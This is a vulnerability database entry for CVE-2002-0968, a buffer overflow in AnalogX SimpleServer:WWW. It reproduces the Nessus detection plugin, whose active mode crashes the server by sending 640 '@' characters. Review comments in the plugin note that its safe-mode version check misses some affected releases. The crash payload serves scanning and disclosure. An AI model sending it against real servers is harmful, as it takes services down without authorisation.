Vulnerabilities > CVE-2002-0968 - Buffer Overflow vulnerability in AnalogX SimpleServer:WWW Web Server

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL

Summary

Buffer overflow in AnalogX SimpleServer:WWW 1.16 and earlier allows remote attackers to cause a denial of service (crash) and execute code via a long HTTP request method name.

Exploit-Db

description: AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability. CVE-2002-0968. Remote exploit for Windows platform
id: EDB-ID:21542
last seen: 2016-02-02
modified: 2002-06-13
published: 2002-06-13
reporter: Auriemma Luigi
source: https://www.exploit-db.com/download/21542/
title: AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability

Nessus

NASL family: Web Servers
NASL id: SIMPLESERVERWWW_DOS.NASL
description: The remote installation of AnalogX SimpleServer:WWW is affected by a buffer overflow triggered when processing input, such as a series of 640 '@' characters. An unauthenticated, remote attacker can leverage this issue to crash the affected service or even to execute arbitrary code on the remote host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11035
published: 2002-06-30
reporter: This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11035
title: AnalogX SimpleServer:WWW Buffer Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Reference:
# To: [email protected]
# From:"Fort _" <[email protected]>
# Subject: Remote DoS in AnalogX SimpleServer:www 1.16
# Message-ID: <[email protected]>

include("compat.inc");

if(description)
{
 # Registration phase: only plugin metadata is declared here; no traffic
 # is sent to the target until the body after this block runs.
 script_id(11035);
 script_version("1.27");

 script_cve_id("CVE-2002-0968");
 script_bugtraq_id(5006);

 script_name(english:"AnalogX SimpleServer:WWW Buffer Overflow");
 script_summary(english:"Crashes SimpleServer:WWW");
 
 script_set_attribute(
  attribute:"synopsis",
  value:"The remote web server is vulnerable to a buffer overflow attack."
 );
 script_set_attribute( attribute:"description", value:
"The remote installation of AnalogX SimpleServer:WWW is affected by a
buffer overflow triggered when processing input, such as a series of
640 '@' characters.  An unauthenticated, remote attacker can leverage
this issue to crash the affected service or even to execute arbitrary
code on the remote host." );
 script_set_attribute(attribute:"see_also", 
  value:"https://seclists.org/bugtraq/2002/Jun/112"
 );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://seclists.org/bugtraq/2002/Jul/13"
 );
 script_set_attribute(
  attribute:"solution", 
  value:"Upgrade to version 1.23 or later as that reportedly fixes the issue."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/06/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/06/13");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 # Mixed category: the body below is banner-only when safe checks are
 # enabled and performs an active crash test otherwise, so this plugin can
 # take the service down when run without safe checks.
 script_category(ACT_MIXED_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 # Run only after HTTP fingerprinting, and only where the
 # "www/simpleserver" KB key is present (presumably set by
 # http_version.nasl when it recognises this server - confirm).
 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/simpleserver");
 exit(0);
}

# The script code starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Pick the HTTP port to test (default 80).
# NOTE(review): embedded: 0 presumably excludes ports tagged as embedded
# web servers - confirm against http.inc before relying on it.
port = get_http_port(default:80, embedded: 0);

# No banner means nothing to fingerprint; stop silently.
banner = get_http_banner(port: port);
if (! banner) exit(0);

# Only SimpleServer:WWW installations are in scope.
if (!egrep(pattern:"^Server: *SimpleServer:WWW/", string:banner)) exit(0);


# Safe-checks path: decide from the advertised version alone and never
# send the crashing request.
if (safe_checks())
{
  # NOTE(review): this pattern only matches a version string that ends
  # right after "1.0" or "1.1" (one minor digit followed by a non-digit
  # or end of line). If the banner carries two minor digits - e.g. the
  # "1.16" named in the advisory - such installs are never flagged in
  # safe mode, and 1.17-1.22 (below the 1.23 fix stated in the solution)
  # are not covered either. The "." is also unescaped and matches any
  # character. Confirm the real banner format before widening it.
  if (egrep(pattern:"^Server: *SimpleServer:WWW/1.[01]([^0-9]|$)", string:banner))
  {
    # Keep just the Server header line: strstr() yields the banner from
    # "Server:" to its end, and subtracting the tail from the first CRLF
    # drops everything after that line.
    server = strstr(banner, "Server:");
    server = server - strstr(server, '\r\n');

    report = string(
      "\n",
      "Nessus made this determination based on the version in the following\n",
      "Server response header :\n",
      "\n",
      "  ", server, "\n"
    );
    security_hole(port:port, extra:report);
  }
  exit(0);
}

# Active path: make sure the server is alive first, otherwise the
# post-request liveness check below would produce a false positive.
if (http_is_dead(port: port)) exit(1, "The web server is dead");

# Send 640 '@' characters in place of a request line, terminated by the
# blank line that ends the headers. The response itself is not
# inspected (w is never read); only the server's liveness afterwards is.
w = http_send_recv_buf(port: port, 
  data:string(crap(length:640, data:"@"), "\r\n\r\n"));

# The server stopped answering after the oversized request: report it.
if (http_is_dead(port: port)) security_hole(port);